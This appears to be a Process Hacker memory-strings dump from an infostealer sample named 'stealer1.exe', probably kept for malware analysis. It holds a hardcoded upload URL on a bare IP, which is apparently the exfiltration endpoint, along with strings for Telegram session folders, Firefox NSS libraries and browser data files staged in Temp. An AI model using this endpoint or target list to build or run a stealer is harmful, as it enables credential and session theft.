stealer2_28d213ccdf6f5856c12e928a372c1d56

http://141.105.71.82/Upload/

file; filename .zip
Content-Type: application/octet-stream

id f9686f36-49cc-4f37-b2a9-b3b0572473cb (original af3c4c9f-8ea3-413f-af4b-5700ee9157bc)

f9686f36-49cc-4f37-b2a9-b3b0572473cb
af3c4c9f-8ea3-413f-af4b-5700ee9157bc


Process Hacker 2.39.124
Windows NT 6.1 Service Pack 1 (64-bit)
8/15/2018 7:26:16 AM

0x15b8fc (58): C:\Users\A\AppData\Local\Temp
0x15bbec (41): C:\Users\A\AppData\Local\Temp\nssdbm3.dll
0x163444 (82): C:\Users\A\AppData\Local\Temp\nssdbm3.dll
0x163c10 (41): C:\Users\A\AppData\Local\Temp\nssdbm3.dll
0x16ac30 (84): C:\Users\A\AppData\Local\Temp\MSVCP140.dll
0x16b044 (24): MSVCP140.dll
0x16b0ea (22): RtlInitializeSListHead
0x16b370 (22): mozglue.dll
0x16b898 (30): C:\Users\A\AppData\Local\Temp\
0x16bc96 (62): 8C:\Users\A\AppData\Local\Temp\
0x16bec0 (36): C:\Users\A\AppData\Local\Temp\32.zip
0x16c2ce (62): 6C:\Users\A\AppData\Local\Temp\
0x16c4d8 (40): C:\Users\A\AppData\Local\Temp\result.txt
0x16ccf0 (44): C:\Program Files (x86)
0x16cef8 (29): C:tdata\D877F783D5D3EF8C\map0
0x16d308 (25): C:tdata\D877F783D5D3EF8C0
0x16d718 (29): C:tdata\D877F783D5D3EF8C\map1
0x16db28 (25): C:tdata\D877F783D5D3EF8C1
0x16db64 (138): \Registry\Machine\System\CurrentControlSet\Control\Nls\ExtendedLocale
0x16df10 (148): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.EN.DLL
0x16e208 (148): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.EN.DLL
0x16e338 (60): C:\Users\A\AppData\Local\Temp\
0x16e5f0 (98): C:\Program Files (x86)\IEInspector\HTTPAnalyzerF>
0x16e748 (60): C:\Users\A\AppData\Local\Temp\
0x16e950 (24): C:\Users\A\AppData\Local
0x16ea58 (19): 2018-08-15 07-22-39
0x16ebe8 (34): C:\Users\A\AppData\Local\Temp\.zip
0x16efe0 (144): C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-core-localization-
0x16f128 (20): C:\Users\A\Documents
0x16f230 (26): C:\Users\A\AppData\Roaming
0x16f338 (18): C:\Users\A\Desktop
0x16f3ec (66): api-ms-win-core-localization-l1-G
0x16f568 (30): C:\Users\A\AppData\Local\Temp\
0x16fba4 (12): PQRSTUVWXYZ[
0x16fcd8 (104): \Device\HarddiskVolume2\Users\A\Desktop\stealer1.exe
0x24ca78 (12): 3++S++
0x24d078 (12): 3++S++
0x24dcb0 (24): \KnownDlls32
0x24dcca (16): glue.dll
0x24e4b0 (16): Harddisk
0x24e4c8 (16): me2\Wind
0x24e676 (16): USERDA~1
0x24e68e (18): User Data
0x24e790 (16): \Session
0x24e7c0 (24): \Sessionvv1\
0x24e7e0 (130): \??\C:\Windows\SysWOW64\WindowsPowerShell\v1.0\MSVCP140.dlllC:\W\
0x24ece0 (58): C:\Windows\syswow64\ntdll.dll
0x24eea2 (15): Wow64ApcRoutine
0x24eeb2 (8): xception
0x24f1c0 (58): C:\Windows\SYSTEM32\wow64.dll
0x281320 (14): =::=::\
0x281330 (60): ALLUSERSPROFILE=C:\ProgramData
0x28136e (68): APPDATA=C:\Users\A\AppData\Roaming
0x2813b4 (96): CommonProgramFiles=C:\Program Files\Common Files
0x281416 (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
0x28148e (96): CommonProgramW6432=C:\Program Files\Common Files
0x2814f0 (28): COMPUTERNAME=O
0x28150e (70): ComSpec=C:\Windows\system32\cmd.exe
0x281556 (38): FP_NO_HOST_CHECK=NO
0x28157e (24): HOMEDRIVE=C:
0x281598 (34): HOMEPATH=\Users\A
0x2815bc (74): LOCALAPPDATA=C:\Users\A\AppData\Local
0x281608 (30): LOGONSERVER=\\O
0x281628 (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
0x2816b4 (72): MpConfig_ProductCodeName=AntiSpyware
0x2816fe (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
0x28176c (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
0x281814 (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
0x28188c (44): NUMBER_OF_PROCESSORS=4
0x2818ba (26): OS=Windows_NT
0x2818d6 (322): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
0x281a1a (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
0x281a96 (56): PROCESSOR_ARCHITECTURE=AMD64
0x281ad0 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
0x281b62 (34): PROCESSOR_LEVEL=6
0x281b86 (46): PROCESSOR_REVISION=9e09
0x281bb6 (52): ProgramData=C:\ProgramData
0x281bec (58): ProgramFiles=C:\Program Files
0x281c28 (80): ProgramFiles(x86)=C:\Program Files (x86)
0x281c7a (58): ProgramW6432=C:\Program Files
0x281cb6 (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
0x281d38 (44): PUBLIC=C:\Users\Public
0x281d66 (38): SESSIONNAME=Console
0x281d8e (28): SystemDrive=C:
0x281dac (42): SystemRoot=C:\Windows
0x281dd8 (68): TEMP=C:\Users\A\AppData\Local\Temp
0x281e1e (66): TMP=C:\Users\A\AppData\Local\Temp
0x281e62 (24): USERDOMAIN=O
0x281e7c (20): USERNAME=A
0x281e92 (44): USERPROFILE=C:\Users\A
0x281ec0 (34): windir=C:\Windows
0x281ee4 (46): windows_tracing_flags=3
0x281f14 (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
0x2823b0 (38): C:\Users\A\Desktop\
0x2825b8 (454): C:\Users\A\Desktop;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
0x282780 (62): C:\Users\A\Desktop\stealer1.exe
0x2827c0 (68): "C:\Users\A\Desktop\stealer1.exe"
0x282806 (62): C:\Users\A\Desktop\stealer1.exe
0x282846 (30): Winsta0\Default
0x282870 (58): C:\Windows\SYSTEM32\ntdll.dll
0x2828c0 (38): C:\Windows\system32
0x282900 (38): C:\Windows\SYSTEM32
0x282b38 (22): C:\Windows\
0x282d6c (14): \SYSTEN
0x282d9c (14): TEM32\O
0x282dd0 (64): C:\Windows\SYSTEM32\wow64win.dll
0x282f80 (58): C:\Windows\SYSTEM32\wow64.dll
0x2830dc (14): TEM32\N
0x28313c (14): 2\wow6H
0x283150 (66): \Sessions\1\Windows\ApiPortection
0x2831b0 (30): stemFunction035
0x2831d0 (16): rogresst
0x2831e4 (12): ip.dll
0x283340 (64): C:\Windows\SYSTEM32\wow64cpu.dll
0x2834a0 (214): \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST
0x283580 (20): figuration
0x283596 (16):  Folders
0x283cb8 (238): \Registry\Machine\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST
0x330800 (60): ALLUSERSPROFILE=C:\ProgramData
0x33083e (68): APPDATA=C:\Users\A\AppData\Roaming
0x330884 (108): CommonProgramFiles=C:\Program Files (x86)\Common Files
0x3308f2 (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
0x33096a (96): CommonProgramW6432=C:\Program Files\Common Files
0x3309cc (28): COMPUTERNAME=O
0x3309ea (70): ComSpec=C:\Windows\system32\cmd.exe
0x330a32 (38): FP_NO_HOST_CHECK=NO
0x330a5a (24): HOMEDRIVE=C:
0x330a74 (34): HOMEPATH=\Users\A
0x330a98 (74): LOCALAPPDATA=C:\Users\A\AppData\Local
0x330ae4 (30): LOGONSERVER=\\O
0x330b04 (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
0x330b90 (72): MpConfig_ProductCodeName=AntiSpyware
0x330bda (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
0x330c48 (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
0x330cf0 (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
0x330d68 (44): NUMBER_OF_PROCESSORS=4
0x330d96 (26): OS=Windows_NT
0x330db2 (322): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
0x330ef6 (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
0x330f72 (52): PROCESSOR_ARCHITECTURE=x86
0x330fa8 (56): PROCESSOR_ARCHITEW6432=AMD64
0x330fe2 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
0x331074 (34): PROCESSOR_LEVEL=6
0x331098 (46): PROCESSOR_REVISION=9e09
0x3310c8 (52): ProgramData=C:\ProgramData
0x3310fe (70): ProgramFiles=C:\Program Files (x86)
0x331146 (80): ProgramFiles(x86)=C:\Program Files (x86)
0x331198 (58): ProgramW6432=C:\Program Files
0x3311d4 (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
0x331256 (44): PUBLIC=C:\Users\Public
0x331284 (38): SESSIONNAME=Console
0x3312ac (28): SystemDrive=C:
0x3312ca (42): SystemRoot=C:\Windows
0x3312f6 (68): TEMP=C:\Users\A\AppData\Local\Temp
0x33133c (66): TMP=C:\Users\A\AppData\Local\Temp
0x331380 (24): USERDOMAIN=O
0x33139a (20): USERNAME=A
0x3313b0 (44): USERPROFILE=C:\Users\A
0x3313de (34): windir=C:\Windows
0x331402 (46): windows_tracing_flags=3
0x331432 (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
0x331502 (14): h>@0DFp
0x331760 (38): C:\Users\A\Desktop\
0x331968 (454): C:\Users\A\Desktop;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
0x331b30 (62): C:\Users\A\Desktop\stealer1.exe
0x331b70 (68): "C:\Users\A\Desktop\stealer1.exe"
0x331bb6 (62): C:\Users\A\Desktop\stealer1.exe
0x331bf6 (30): Winsta0\Default
0x331c18 (14): =::=::\
0x331c28 (60): ALLUSERSPROFILE=C:\ProgramData
0x331c66 (68): APPDATA=C:\Users\A\AppData\Roaming
0x331cac (96): CommonProgramFiles=C:\Program Files\Common Files
0x331d0e (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
0x331d86 (96): CommonProgramW6432=C:\Program Files\Common Files
0x331de8 (28): COMPUTERNAME=O
0x331e06 (70): ComSpec=C:\Windows\system32\cmd.exe
0x331e4e (38): FP_NO_HOST_CHECK=NO
0x331e76 (24): HOMEDRIVE=C:
0x331e90 (34): HOMEPATH=\Users\A
0x331eb4 (74): LOCALAPPDATA=C:\Users\A\AppData\Local
0x331f00 (30): LOGONSERVER=\\O
0x331f20 (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
0x331fac (72): MpConfig_ProductCodeName=AntiSpyware
0x331ff6 (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
0x332064 (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
0x33210c (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
0x332184 (44): NUMBER_OF_PROCESSORS=4
0x3321b2 (26): OS=Windows_NT
0x3321ce (322): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
0x332312 (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
0x33238e (56): PROCESSOR_ARCHITECTURE=AMD64
0x3323c8 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
0x33245a (34): PROCESSOR_LEVEL=6
0x33247e (46): PROCESSOR_REVISION=9e09
0x3324ae (52): ProgramData=C:\ProgramData
0x3324e4 (58): ProgramFiles=C:\Program Files
0x332520 (80): ProgramFiles(x86)=C:\Program Files (x86)
0x332572 (58): ProgramW6432=C:\Program Files
0x3325ae (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
0x332630 (44): PUBLIC=C:\Users\Public
0x33265e (38): SESSIONNAME=Console
0x332686 (28): SystemDrive=C:
0x3326a4 (42): SystemRoot=C:\Windows
0x3326d0 (68): TEMP=C:\Users\A\AppData\Local\Temp
0x332716 (66): TMP=C:\Users\A\AppData\Local\Temp
0x33275a (24): USERDOMAIN=O
0x332774 (20): USERNAME=A
0x33278a (44): USERPROFILE=C:\Users\A
0x3327b8 (34): windir=C:\Windows
0x3327dc (46): windows_tracing_flags=3
0x33280c (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
0x3328a8 (40): C:\Windows\SYSTEM32\
0x3328d2 (24): ROCESSOR_IDJ
0x3328f0 (38): C:\Windows\syswow64
0x332a28 (58): C:\Windows\SysWOW64\ntdll.dll
0x332a90 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
0x332c98 (64): C:\Windows\syswow64\kernel32.dll
0x332d80 (68): C:\Windows\syswow64\KERNELBASE.dll
0x332e7f (35):
"C:\Users\A\Desktop\stealer1.exe"
0x332eb0 (98): C:\Windows\system32;C:\Windows\system;C:\Windows;
0x3334a8 (60): C:\Windows\syswow64\USER32.dll
0x333588 (58): C:\Windows\syswow64\GDI32.dll
0x3336b0 (54): C:\Windows\syswow64\LPK.dll
0x3337e8 (58): C:\Windows\syswow64\USP10.dll
0x3338b0 (60): C:\Windows\syswow64\msvcrt.dll
0x337870 (128): ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
0x337942 (14): Q!1AQaq
0x355710 (64): C:\Windows\syswow64\ADVAPI32.dll
0x3557e0 (60): C:\Windows\syswow64\RPCRT4.dll
0x3558a8 (62): C:\Windows\syswow64\SspiCli.dll
0x355970 (66): C:\Windows\syswow64\CRYPTBASE.dll
0x3559c0 (62): C:\Windows\syswow64\SHELL32.dll
0x355a08 (62): C:\Windows\SysWOW64\sechost.dll
0x355bd0 (62): C:\Windows\syswow64\SHLWAPI.dll
0x356098 (62): C:\Windows\syswow64\CRYPT32.dll
0x356160 (60): C:\Windows\syswow64\MSASN1.dll
0x3568e0 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
0x357368 (12): PR((*P
0x3573e0 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
0x3581a8 (60): C:\Windows\syswow64\WS2_32.dll
0x3581f0 (54): C:\Windows\syswow64\NSI.dll
0x358230 (62): C:\Windows\syswow64\WLDAP32.dll
0x358278 (64): C:\Windows\syswow64\Normaliz.dll
0x3589fe (124): 3system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\SystH
0x358ac6 (458): 6ilC:\Users\A\Desktop;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
0x358cce (14): 5ft\Win
0x359546 (28): windir=C:\Wink
0x3595ac (120): racing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
0x359706 (7): \-`([Y%
0x35976c (7): }yaIpA

0x359e98 (58): C:\Windows\syswow64\MSCTF.dll
0x35a0c0 (58): C:\Windows\system32\IMM32.DLL
0x35b6ff (8): vDEFAULT
0x35b727 (8): v2.5.4.3
0x35b74f (8): v2.5.4.4
0x35b777 (8): v2.5.4.5
0x35b79f (8): v2.5.4.6
0x35b7c7 (8): v2.5.4.7
0x35b7ef (8): v2.5.4.8
0x35b817 (8): v2.5.4.9
0x35bd90 (27): CryptSIPDllPutSignedDataMsg
0x35bde0 (27): CryptSIPDllGetSignedDataMsg
0x35be30 (30): CryptSIPDllRemoveSignedDataMsg
0x35be80 (29): CryptSIPDllCreateIndirectData
0x35bed0 (29): CryptSIPDllVerifyIndirectData
0x35bf38 (23): CryptSIPDllIsMyFileType
0x35bf80 (23): CertDllVerifyRevocation
0x35bfc8 (21): CertDllVerifyCTLUsage
0x35c010 (20): CryptDllFormatObject
0x35c058 (22): CertDllEnumSystemStore
0x35c0a0 (20): CertDllOpenStoreProv
0x35c0e8 (20): CryptCNGPKCS12GetMap
0x35c130 (16): CryptCNGInitHMAC
0x35c178 (20): CryptDllEncodeObject
0x35c1c0 (20): CryptDllDecodeObject
0x35c208 (22): CryptDllEncodeObjectEx
0x35c250 (22): CryptDllDecodeObjectEx
0x35c2b8 (58): C:\Windows\syswow64\ole32.dll
0x35c300 (62): C:\Windows\system32\version.dll
0x35c348 (62): C:\Windows\system32\wsock32.dll
0x35c390 (62): C:\Users\A\Desktop\stealer1.exe
0x35c440 (22): NUMBER_OF_PROCESSORS=4
0x35c488 (26): PROCESSOR_ARCHITECTURE=x86
0x35c4d0 (23): PROCESSOR_REVISION=9e09
0x35c518 (26): ProgramData=C:\ProgramData
0x35c560 (22): PUBLIC=C:\Users\Public
0x35c5a8 (21): SystemRoot=C:\Windows
0x35c5f0 (22): USERPROFILE=C:\Users\A
0x35c638 (23): windows_tracing_flags=3
0x35c6a8 (52): C:\Users\A\AppData\Roaming
0x35c6f0 (48): C:\Users\A\AppData\Local
0x35c7c8 (62): C:\Windows\system32\secur32.dll
0x35c8a0 (62): C:\Windows\system32\mswsock.dll
0x35c8e8 (60): C:\Windows\System32\wship6.dll
0x35c9c0 (60): C:\Windows\system32\DNSAPI.dll
0x35ca08 (60): C:\Windows\system32\WINNSI.DLL
0x35cc00 (60): C:\Windows\system32\ncrypt.dll
0x35cc90 (56): Microsoft Package Negotiator
0x35ccd8 (58): NegoExtender Security Package
0x35cd20 (60): C:\Windows\SysWOW64\msv1_0.DLL
0x35cd68 (58): C:\Windows\SysWOW64\TsPkg.DLL
0x35cdb0 (58): C:\Windows\SysWOW64\pku2u.DLL
0x35cdf8 (62): C:\Windows\system32\credssp.dll
0x35ce40 (62): C:\Windows\system32\credssp.dll
0x35ce88 (60): C:\Windows\system32\bcrypt.dll
0x35cf20 (24): CryptSIPDllIsMyFileType2
0x35cf70 (29): CryptDllExportPublicKeyInfoEx
0x35cfc0 (29): CryptDllImportPublicKeyInfoEx
0x35d010 (36): CryptDllEncodePublicKeyAndParameters
0x35d068 (28): CryptDllConvertPublicKeyInfo
0x35d0a7 (21): v1.2.840.113549.1.1.1
0x35d0df (14): v1.3.14.3.2.22
0x35d10f (14): v1.3.14.3.2.12
0x35d13f (18): v1.2.840.10040.4.1
0x35d177 (18): v1.2.840.10046.2.1
0x35d1af (21): v1.2.840.113549.1.3.1
0x35d1e7 (21): v1.2.840.113549.1.1.1
0x35d21f (14): v1.3.14.3.2.22
0x35d24f (14): v1.3.14.3.2.12
0x35d27f (18): v1.2.840.10040.4.1
0x35d2c8 (41): CryptDllExtractEncodedSignatureParameters
0x35d328 (25): CryptDllSignAndEncodeHash
0x35d378 (30): CryptDllVerifyEncodedSignature
0x35d3e0 (30): CryptDllImportPublicKeyInfoEx2
0x35d430 (30): CryptDllExportPublicKeyInfoEx2
0x35d480 (26): CertDllOpenSystemStoreProv
0x35d4d0 (26): CertDllRegisterSystemStore
0x35d520 (28): CertDllUnregisterSystemStore
0x35d570 (28): CertDllRegisterPhysicalStore
0x35d5c0 (30): CertDllUnregisterPhysicalStore
0x35d610 (24): CertDllEnumPhysicalStore
0x35d660 (30): CryptDllExportPrivateKeyInfoEx
0x35d6b0 (30): CryptDllImportPrivateKeyInfoEx
0x35d700 (28): CryptMsgDllCNGExportKeyTrans
0x35d750 (28): CryptMsgDllCNGExportKeyAgree
0x35d7a0 (28): CryptMsgDllCNGImportKeyTrans
0x35d7f0 (28): CryptMsgDllCNGImportKeyAgree
0x35d840 (24): CryptMsgDllGenEncryptKey
0x35d890 (27): CryptMsgDllExportEncryptKey
0x35d8e0 (27): CryptMsgDllImportEncryptKey
0x35d930 (31): CryptMsgDllGenContentEncryptKey
0x35d980 (25): CryptMsgDllExportKeyTrans
0x35d9d0 (25): CryptMsgDllExportKeyAgree
0x35da20 (25): CryptMsgDllExportMailList
0x35da70 (25): CryptMsgDllImportKeyTrans
0x35dac0 (25): CryptMsgDllImportKeyAgree
0x35db10 (25): CryptMsgDllImportMailList
0x35db38 (64): C:\Windows\syswow64\oleaut32.dll
0x35dce8 (30): ALLUSERSPROFILE=C:\ProgramData
0x35dd38 (34): APPDATA=C:\Users\A\AppData\Roaming
0x35dd88 (35): ComSpec=C:\Windows\system32\cmd.exe
0x35ddd8 (28): PROCESSOR_ARCHITEW6432=AMD64
0x35de28 (35): ProgramFiles=C:\Program Files (x86)
0x35de78 (29): ProgramW6432=C:\Program Files
0x35dec8 (34): TEMP=C:\Users\A\AppData\Local\Temp
0x35df18 (33): TMP=C:\Users\A\AppData\Local\Temp
0x35df98 (64): C:\Windows\System32\wshtcpip.dll
0x35dfe8 (64): C:\Windows\system32\IPHLPAPI.DLL
0x35e0d8 (64): C:\Windows\system32\rasadhlp.dll
0x35e128 (64): C:\Windows\System32\fwpuclnt.dll
0x35e198 (29): ProgramW6432=C:\Program Files
0x35e1e8 (35): ProgramFiles=C:\Program Files (x86)
0x35e238 (34): APPDATA=C:\Users\A\AppData\Roaming
0x35e288 (28): PROCESSOR_ARCHITEW6432=AMD64
0x35e2d8 (35): ComSpec=C:\Windows\system32\cmd.exe
0x35e328 (30): ALLUSERSPROFILE=C:\ProgramData
0x35e3c8 (46): CryptDllExportPublicKeyInfoFromBCryptKeyHandle
0x35e417 (9): v2.5.4.10
0x35e447 (9): v2.5.4.11
0x35e477 (9): v2.5.4.12
0x35e4a7 (9): v2.5.4.13
0x35e4d7 (9): v2.5.4.14
0x35e507 (9): v2.5.4.15
0x35e537 (9): v2.5.4.16
0x35e567 (9): v2.5.4.17
0x35e597 (9): v2.5.4.18
0x35e5c7 (9): v2.5.4.19
0x35e60f (9): v2.5.4.20
0x35e63f (9): v2.5.4.21
0x35e66f (9): v2.5.4.22
0x35e69f (9): v2.5.4.23
0x35e6cf (9): v2.5.4.24
0x35e6ff (9): v2.5.4.25
0x35e72f (9): v2.5.4.26
0x35e75f (9): v2.5.4.27
0x35e78f (9): v2.5.4.28
0x35e7bf (9): v2.5.4.29
0x35e7ef (9): v2.5.4.30
0x35e81f (9): v2.5.4.31
0x35e84f (9): v2.5.4.32
0x35e87f (9): v2.5.4.33
0x35e8af (9): v2.5.4.34
0x35e8df (9): v2.5.4.35
0x35e90f (9): v2.5.4.36
0x35e93f (9): v2.5.4.37
0x35e96f (9): v2.5.4.38
0x35e99f (9): v2.5.4.39
0x35e9cf (9): v2.5.4.40
0x35e9ff (9): v2.5.4.42
0x35ea2f (9): v2.5.4.43
0x35ea5f (10): v2.5.29.19
0x35ea8f (10): v2.5.29.10
0x35eabf (10): v2.5.29.21
0x35eaef (10): v2.5.29.37
0x35eb1f (9): v2.5.29.7
0x35eb4f (9): v2.5.29.8
0x35eb7f (10): v2.5.29.17
0x35ebaf (10): v2.5.29.18
0x35ebdf (9): v2.5.29.1
0x35ec0f (10): v2.5.29.35
0x35ec3f (10): v2.5.29.14
0x35ec6f (10): v2.5.29.15
0x35ec9f (9): v2.5.29.2
0x35eccf (9): v2.5.29.4
0x35ecff (10): v2.5.29.31
0x35ed2f (10): v2.5.29.46
0x35ed5f (10): v2.5.29.32
0x35ed8f (10): v2.5.29.20
0x35edbf (10): v2.5.29.27
0x35edf7 (27): v0.9.2342.19200300.100.1.25
0x35ee37 (22): v1.2.840.113549.1.9.20
0x35ee6f (22): v1.2.840.113549.1.9.21
0x35eea7 (21): v1.3.6.1.4.1.311.10.2
0x35eedf (23): v1.3.6.1.4.1.311.2.1.27
0x35ef17 (22): v1.2.840.113549.1.9.15
0x35ef4f (18): v1.3.6.1.5.5.7.1.1
0x35ef87 (19): v1.3.6.1.5.5.7.1.11
0x35efbf (21): v1.3.6.1.4.1.311.20.2
0x35efff (23): v1.3.6.1.4.1.311.13.2.3
0x35f04f (22): v2.16.840.1.113730.1.1
0x35f087 (22): v2.16.840.1.113730.1.2
0x35f0bf (22): v2.16.840.1.113730.1.3
0x35f0f7 (22): v2.16.840.1.113730.1.4
0x35f12f (22): v2.16.840.1.113730.1.7
0x35f167 (22): v2.16.840.1.113730.1.8
0x35f19f (23): v2.16.840.1.113730.1.12
0x35f1d7 (23): v2.16.840.1.113730.1.13
0x35f20f (23): v1.3.6.1.4.1.311.13.2.1
0x35f247 (21): v1.3.6.1.4.1.311.21.1
0x35f27f (23): v1.3.6.1.4.1.311.2.1.10
0x35f2b7 (21): v1.3.6.1.4.1.311.21.3
0x35f2ef (21): v1.3.6.1.4.1.311.21.4
0x35f327 (21): v1.3.6.1.4.1.311.21.2
0x35f35f (22): v1.3.6.1.4.1.311.21.10
0x35f397 (22): v1.3.6.1.4.1.311.21.11
0x35f3cf (22): v1.3.6.1.4.1.311.21.12
0x35f407 (21): v1.3.6.1.4.1.311.21.7
0x35f43f (22): v1.3.6.1.4.1.311.21.14
0x35f477 (23): v1.3.6.1.4.1.311.10.9.1
0x35f4af (24): v1.2.840.113549.1.12.1.1
0x35f4e7 (24): v1.2.840.113549.1.12.1.2
0x35f51f (24): v1.2.840.113549.1.12.1.3
0x35f557 (24): v1.2.840.113549.1.12.1.4
0x35f58f (24): v1.2.840.113549.1.12.1.5
0x35f5c7 (24): v1.2.840.113549.1.12.1.6
0x35f5ff (21): v1.2.840.113549.1.1.1
0x35f637 (18): v1.2.840.10040.4.1
0x35f66f (21): v1.2.840.113549.1.1.1
0x35f6a7 (18): v1.2.840.10040.4.1
0x35f6df (18): v1.3.6.1.5.5.7.2.2
0x35f717 (18): v1.3.6.1.5.5.7.1.1
0x35f74f (19): v1.3.6.1.5.5.7.1.11
0x35f787 (23): v1.3.6.1.4.1.311.2.1.14
0x35f7bf (22): v1.2.840.113549.1.9.14
0x35f7f7 (21): v1.3.6.1.4.1.311.10.2
0x35fa07 (7): vMemory
0x35fa2f (7): vSystem
0x35fa7f (6): vPKCS7
0x35faa7 (7): vPKCS12
0x36004f (10): v2.5.29.28
0x36007f (10): v2.5.29.30
0x3600af (10): v2.5.29.33
0x3600df (10): v2.5.29.36
0x36010f (11): vSerialized
0x36013f (11): vCollection
0x36016f (15): vSystemRegistry
0x36019f (9): vPhysical
0x3601cf (14): v1.3.14.3.2.26
0x3601ff (14): v1.3.14.3.2.12
0x36022f (14): v1.3.14.3.2.12
0x3602bf (9): v2.5.29.1
0x3602ef (9): v2.5.29.2
0x36031f (9): v2.5.29.4
0x36034f (9): v2.5.29.7
0x36037f (9): v2.5.29.8
0x3603af (10): v2.5.29.10
0x3603df (10): v2.5.29.15
0x36040f (10): v2.5.29.19
0x36043f (10): v2.5.29.32
0x36046f (10): v2.5.29.35
0x36049f (10): v2.5.29.14
0x3604cf (10): v2.5.29.17
0x3604ff (10): v2.5.29.18
0x36052f (10): v2.5.29.21
0x36055f (10): v2.5.29.31
0x36058f (10): v2.5.29.37
0x3605bf (10): v2.5.29.20
0x3605ef (10): v2.5.29.27
0x36061f (10): v2.5.29.28
0x36064f (10): v2.5.29.46
0x36067f (10): v2.5.29.30
0x3606af (10): v2.5.29.33
0x3606df (9): v2.5.29.5
0x36070f (10): v2.5.29.36
0x36073f (10): v2.5.29.54
0x36076f (9): v2.5.29.1
0x36079f (9): v2.5.29.2
0x3607cf (9): v2.5.29.4
0x3607ff (9): v2.5.29.7
0x360a27 (21): v1.3.6.1.4.1.311.10.1
0x360a5f (19): v1.2.840.113549.3.2
0x360a97 (22): v1.2.840.113549.1.9.15
0x360acf (18): v1.3.6.1.5.5.7.1.3
0x360b07 (21): v1.2.840.113549.1.9.5
0x360b3f (23): v1.3.6.1.4.1.311.13.2.1
0x360b77 (23): v1.3.6.1.4.1.311.13.2.2
0x360baf (23): v1.3.6.1.4.1.311.10.9.1
0x360be7 (21): v1.3.6.1.4.1.311.21.7
0x360c1f (21): v1.3.6.1.5.5.7.48.1.1
0x360c57 (19): v1.3.6.1.5.5.7.1.12
0x360c8f (18): v1.3.6.1.5.5.7.1.2
0x360cc7 (18): v1.2.840.10045.4.3
0x360cff (18): v1.2.840.10045.2.1
0x360d37 (22): v1.2.840.113549.1.1.10
0x360d6f (21): v1.2.840.113549.1.1.7
0x360ddf (18): v1.3.6.1.5.5.7.2.2
0x360e17 (18): v1.3.6.1.5.5.7.1.1
0x360e4f (19): v1.3.6.1.5.5.7.1.11
0x360e87 (23): v1.3.6.1.4.1.311.2.1.14
0x360ebf (22): v1.2.840.113549.1.9.14
0x360ef7 (21): v1.3.6.1.4.1.311.10.2
